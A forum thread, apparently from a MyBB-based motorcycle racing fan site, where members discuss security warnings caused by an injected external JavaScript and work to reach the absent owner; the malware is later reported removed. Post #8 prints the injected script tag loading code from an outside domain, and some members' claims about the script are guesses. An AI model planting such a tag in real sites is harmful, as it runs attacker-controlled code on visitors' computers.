Riskware Warnings
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#1
Riskware Warnings
new2sportnews.com

seems to be upsetting malwarebytes as frequent riskware warnings for me outgoing from Firefox on the forum, have not tracked it down yet.

Anyone any the wiser?
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
09-06-2022, 09:42 AM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#2
RE: Riskware Warnings
Most pages I load seem to be trying to run a javascript sited on new2sportnews.com over which the forum has no control and could drop something nasty on your PC. Malwarebytes prevents it running.

Advise to steer clear of new2sportnews.com as malwarebytes thinks it maybe compromised.
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
25-07-2022, 04:26 PM
Find Reply
captainsparkledotcom Offline
Moderator
*****

Posts: 1,998
Threads: 561
Joined: Nov 2014
Reputation: 2
#3
RE: Riskware Warnings
I've not seen anything about that, I'm running Chrome nowadays, but used Firefox for many years. 
I also use Malwarebytes, but nothings ever been flagged up.
25-07-2022, 07:31 PM
Website Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#4
RE: Riskware Warnings
I get it all the time on the forum like this in Firefox, but no other sites.

Running an F12 debug seems to suggest the link is embedded in the forum code but my knowledge is not up to date now.
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
(This post was last modified: 25-07-2022, 09:47 PM by Chris_Sav.)
25-07-2022, 09:29 PM
Find Reply
captainsparkledotcom Offline
Moderator
*****

Posts: 1,998
Threads: 561
Joined: Nov 2014
Reputation: 2
#5
RE: Riskware Warnings
I've just run Malwarebytes, but nothing shows up.
Nothing happens when I open the forum in Opera either, we uninstalled Firefox, so I can't try that.
26-07-2022, 07:59 AM
Website Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#6
RE: Riskware Warnings
It's Malwarebytes Premium (paid version), not the browser, that is throwing up the warnings, does it on my PC with Firefox and 'erself's PC on Edge which has never used the forum before.

Firefox debugger shows an external script

https://new2-sport-news.com/ttwebsite.js  (dashes inserted to prevent the link working)

on new2sportnews being run close to the menu bar after PM's. at the top of the page on the forum

I've downloaded that script from new2sportnews but don't know enough javascript to know what it does for certain, but it does appear to replace things!!

External script could do anything when run on your PC so I find this very worrying but safe in the knowledge that Malwarebyes Premium is stopping it running on my PC

Malwarebytes also stops direct loading of the new2sportnews site as being unsafe.

Wish someone were about with access to the forum code to prove I'm worried about nothing
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
29-07-2022, 09:08 AM
Find Reply
milestone 11 Offline
Member
***

Posts: 121
Threads: 9
Joined: Dec 2014
Reputation: 0
#7
RE: Riskware Warnings
I'm not getting any warnings at all Chris and I have a hefty internet security. Using firefox in Win7, Win11, and Silk.
02-08-2022, 02:52 PM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#8
RE: Riskware Warnings
Thanks for posting, I certainly find it strange that no one else has seen the warnings. To repeat though it's not Firefox or any other browser, I have the paid version of the anti-malware programme Malwarebytres and it is that throwing up the warning on both machines I have it installed on. Also I do not get it on any other site I normally visit.

It looks like a known MyBB vulnerability on a couple of versions ago

https://blog.sonarsource.com/mybb-remote...ion-chain/

Explains it. I cannot tell what version the forum is on, but Malcolm's illness may mean it's not the latest with the fix.

The debugger (F12 on Firefox) shows me the script in the forum header.

<!-- </div> in header_welcomeblock_member and header_welcomeblock_guest -->
<script src="https://new2sportnews.com/ttwebsite.js"></script>

No external script should ever be run on this or any site, hence my worry.  

new2sportnews is a known dodgy Nigerian site.

Just wish we had a moderator with code access, I have tried Benjiesdad who was the last mod to log on two years ago but he cannot help.
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
02-08-2022, 06:43 PM
Find Reply
Alfie Noakes Offline
Administrator
*******

Posts: 844
Threads: 14
Joined: Nov 2014
Reputation: 0
#9
RE: Riskware Warnings
within the last few days when I click on the site i'm getting Norton pop-up message telling me they've blocked a Malicious Domain Request 22 and the toolbar is telling me that the site is Not secure - tbh I don't know what it was secure before I started getting the warning from Norton .... is that the same thing you're talking about Chris ? .. thanks Alfie.
10-08-2022, 09:27 PM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#10
RE: Riskware Warnings
Yes pretty much but there are two separate issues there.

Insecure domain: The forum has not been upgraded to HTTPS encoded transmission (SSL) from plain text HTTP. This is of lesser importance as no sensitive data apart from UID/password is exchanged between your browser and the forum. Browsers are all warning of armageddon if you access sites using the older protocol, but it does not matter unless you are sending banking details or the like over the internet, then they need to be encoded.

The riskware: Yes I am certain the site has been infected by the insertion of code that runs a script on a Nigerian website. There is a known simple vulnerability in MyBB that used to allow this. All the perpetrator had to do was to send a mod a PM containing the insertion code and that bypassed all security once the mod opened it. At the moment the script just appears to insert a tracker on your PC, but it could do much more such as install a keylogger and get all your passwords. As you are seeing the warning you are safe and the transmission stopped.

The second issue is worrying! and easily fixable but no-one has access to the full forum moderation access. Poor Malcolm appears out of the game long term, my emails / pm's have not been answered. I have traced a phone number to where he used to live near Blackpool but get no reply to ringing or leaving a message on the answerphone. I have swapped pm's with benjiesdad the last mod to log on two years ago and he cannot help. Malcolm's account has only been used once, and then only briefly since 6th June.

The future of the forum is also once again uncertain. The domain registration runs out on 12th September and the forum will die unless Malcolm has set up an 'auto-renew'.

I have a long history in IT but retired twenty years ago so most of my knowledge is out of date. I do still own a large forum elsewhere but not MyBB coding unfortunately.

I am off to The Island on Tuesday for the duration so will not be in a position to help further until the start of September. There will be bills to pay and only Malcolm can do that, the existence of the forum is not cost free so we have a lot to thank Malcolm for as well as running it.
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
(This post was last modified: 11-08-2022, 09:57 AM by Chris_Sav.)
11-08-2022, 09:34 AM
Find Reply
Splashdown Offline
Senior Member
****

Posts: 559
Threads: 32
Joined: Nov 2005
Reputation: 0
#11
RE: Riskware Warnings
Thanks for the update Chris. It is indeed very worrying re the future of the website, which I have been connected to for well over 20 years. I am no I.T. (ha! not even a TT expert now), so I can offer no advice.
I DO hope Malcolm is OK, and best wishes to him if he reads this.
11-08-2022, 03:27 PM
Find Reply
Rednine Offline
Member
***

Posts: 177
Threads: 6
Joined: Nov 2014
Reputation: 0
#12
RE: Riskware Warnings
Thank you also from me Chris, I have not knowingly had any issues to worry about but, like Splashdown I am no IT expert either. Also, very best wishes to Malcolm. Such a great forum with great camaraderie.  smilie

Smoke me a kipper...........................I'll be back for breakfast Icon_wink
15-08-2022, 02:24 PM
Find Reply
dommyman Offline
Perennial Contributor
*****

Posts: 876
Threads: 21
Joined: Nov 2014
Reputation: 0
#13
RE: Riskware Warnings
(10-08-2022, 09:27 PM)Alfie Noakes Wrote: within the last few days when I click on the site i'm getting Norton pop-up message telling me they've blocked a Malicious Domain Request 22 and the toolbar is telling me that the site is Not secure - tbh I don't know what it was secure before I started getting the warning from Norton .... is that the same thing you're talking about Chris ? .. thanks Alfie.

The same message pops up for me now, started a few days ago. It's a bit worrying for us non IT guys !
29-08-2022, 07:33 PM
Find Reply
Alfie Noakes Offline
Administrator
*******

Posts: 844
Threads: 14
Joined: Nov 2014
Reputation: 0
#14
RE: Riskware Warnings
Hi Chris and IT savvy people out there, does anybody know the cost of getting the updates done and any ongoing server maintenance if that's the tech term ? - I have no problem chipping in towards any costs if a donation were needed to keep the site ticking over, seems a horrible shame to let all Malcolm's previous efforts and work potentially slip away and although the site doesn't currently have Malcolm's usual input we seem to have a regular, polite, sensible, enthusiastic, informed group of people checking in and adding information.....if anyone has any other ideas or help then please let us know what maybe can be done to help ........ the medium severity attempt that Norton is blocking for me is from advertising-cdn dot c o m (didn't want that appearing as a link) if anybody knows what they are trying to gain ? ...
(This post was last modified: 29-08-2022, 09:27 PM by Alfie Noakes.)
29-08-2022, 09:20 PM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#15
RE: Riskware Warnings
I'm tied up until after the weekend, but will try and make a few inquiries of the hosting. They may accept a third party payment to keep it alive, but Malcolm rightly retains ownership and only he has access to sort the advertising spam out
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
31-08-2022, 10:29 PM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#16
RE: Riskware Warnings
Just an update.

I have been in contact with the domain registration company.

There is a procedure for paying the domain registration on Malcolm's behalf and I will try and make contact with Malcolm on the phone number I have from an old registration until Monday.

If I am unsuccessful I will ask the registration company to email Malcolm for permission to pay, should no objecting reply be received within 24 hours they will accept third party payment, but I will need to set up an account. The invoice amount is fairly trivial.

This will only pay the bill, we will be unable to access and remove the malware link, but it would keep the forum alive until early 2023.


I won't put any further info publicly but if anyone can make contact with Malcolm or help then please email / PM me.

There is no indication anywhere that Malcolm has succumbed to illness so I hope to see him here soon laughing at us worrying!
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
(This post was last modified: 01-09-2022, 02:14 PM by Chris_Sav.)
01-09-2022, 02:12 PM
Find Reply
Alfie Noakes Offline
Administrator
*******

Posts: 844
Threads: 14
Joined: Nov 2014
Reputation: 0
#17
RE: Riskware Warnings
Hi Chris, just sent you a PM ... thanks Alfie.
01-09-2022, 08:36 PM
Find Reply
BenjiesDad Offline
Moderator
*****

Posts: 122
Threads: 10
Joined: Dec 2014
Reputation: 0
#18
RE: Riskware Warnings
Chris, have just got in here,
You have email with certain moderator details, to see what you can do,
Its like a firework display with all the warnings going off on my pc !

Sorry for the hassle folks,
02-09-2022, 07:58 PM
Find Reply
Chris_Sav Offline
Administrator
*******

Posts: 617
Threads: 214
Joined: Jan 2018
Reputation: 0
#19
RE: Riskware Warnings
Just to clarify that the malware was removed
[Image: chris-quill-blue.gif]Laurel Bank II Marshal, Classic TT & Manx GP
21-06-2023, 10:45 PM
Find Reply




Users browsing this thread: 1 Guest(s)